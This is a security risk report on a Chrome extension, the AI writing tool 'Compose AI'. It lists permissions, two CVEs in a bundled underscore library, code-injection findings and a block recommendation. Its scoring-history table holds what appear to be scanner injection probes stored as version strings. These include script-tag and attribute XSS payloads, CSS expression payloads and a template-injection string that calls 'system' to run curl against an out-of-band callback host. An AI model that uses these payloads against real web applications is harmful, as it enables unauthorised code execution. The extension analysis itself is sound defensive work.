Compose AI: AI-powered Writing Tool
ddlbpiadoechcolndfeaonajmngmhblj
Risk Score
7.52
Risk Level:
High
Recommendation:
🚫 BLOCK
Top Risks
- MANAGEMENT PERMISSION: extension can enumerate and disable other installed extensions (incl. security and privacy tools).
- Critical CVE in bundled underscore@1.8.3 (CVE-2021-23358: Arbitrary Code Execution) — unpatched, fixed_in 1.12.1
- Dynamic script injection (script_src_dynamic) + new Function() constructor in Gmail/Docs injectors — remote code execution surface
- Privacy policy fetched but scope_extension==false with data_collection+third_party_sharing==true — ADMITS broad data sharing without extension scoping
- Broad host access (http://*/*, https://*/*) combined with webRequest and management permissions
Evidence
- critical_cve_bundled_lib crx underscore@1.8.3 has CVE-2021-23358 (critical, ACE); fixed in 1.12.1 — not updated.
- dynamic_script_injection crx script_src_dynamic found in 5 JS files including Gmail and Docs injectors.
- function_constructor crx new Function() constructor present in 5 JS files; elevated code execution risk.
- privacy_policy_scope_mismatch store Policy fetched but scope_extension=false; admits data_collection+third_party_sharing without extension-specific scope.
- broad_host_access_plus_webrequest manifest http://*/*, https://*/* host perms combined with webRequest and management permissions.
- verified_publisher_featured store Verified publisher + featured by Google; discount capped at -1.0 due to stale (17mo) + CVEs (invariant 0c/0e).
- maintenance_stale store Last updated Jan 2025, 17 months ago; vulnerable lib unpatched in that window.
- ai_extension_broad_content_scripts manifest AI writing tool with content scripts on Gmail, Docs, LinkedIn, WhatsApp, Outlook plus http/https wildcard.
CVE Exposures (2)
| CVE | Library | Severity | Fixed in | Summary |
|---|---|---|---|---|
| CVE-2021-23358 | underscore@1.8.3 | critical | 1.12.1 | Arbitrary Code Execution in underscore |
| CVE-2026-27601 | underscore@1.8.3 | high | 1.13.8 | Underscore has unlimited recursion in _.flatten and _.isEqual, potential for DoS |
Permissions Breakdown
- scripting medium Can inject scripts into pages; paired with broad host access elevates risk.
- tabs medium Access to tab URLs, titles and navigation data.
- webNavigation medium Monitors all navigation events across all sites.
- management high Can list/disable/enable other installed extensions.
- alarms low Scheduled tasks; minimal standalone risk.
- clipboardWrite medium Can write to clipboard silently.
- storage low Local extension data storage.
- webRequest high Observes all network requests across broad host access.
- http://*/* high Broad host access across all HTTP sites.
- https://*/* high Broad host access across all HTTPS sites.
Pillar Scores
Permissions7.50
Reputation2.00
Network2.00
Webstore3.50
Maintenance6.00
Privacy10.00
Code Quality7.50
CVE Exposure7.00
Scoring History
| sssieddrubricxsx | 7.00 | High | block | 2026-08-08 |
| 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> | 7.27 | High | block | 2026-08-05 |
| v3.6'"()&%<zzz><ScRiPt >Ueve(9993)</ScRiPt> | 8.05 | Critical | block | 2026-08-05 |
| v3.6&n903869=v932453 | 7.00 | High | block | 2026-08-05 |
| v3.6&n938936=v972751 | 7.73 | High | block | 2026-08-04 |
| v3.6"sTYLe='zzz:Expre/**/SSion(BDmZ(9178))'bad=" | 7.00 | High | block | 2026-07-29 |
| v3.6"onmouseover=BDmZ(98342)" | 7.00 | High | block | 2026-07-29 |
| <th:t="${dfb}#foreach | 7.43 | High | block | 2026-07-29 |
| dfb[[${98991*97996}]]xca | 7.00 | High | block | 2026-07-29 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitthrchoewes1518f.bxss.me")}} | 7.27 | High | block | 2026-07-29 |
| v1 | 7.00 | High | block | 2026-07-02 |
| v3.6 | 7.52 | High | block | 2026-06-16 |
| v3.4-rev | 5.38 | Medium | review | 2026-06-15 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:26
Listing SHA
bcfe2a9fdf64…
Force block
— not fired
Score recovered
no
Elapsed
52.0s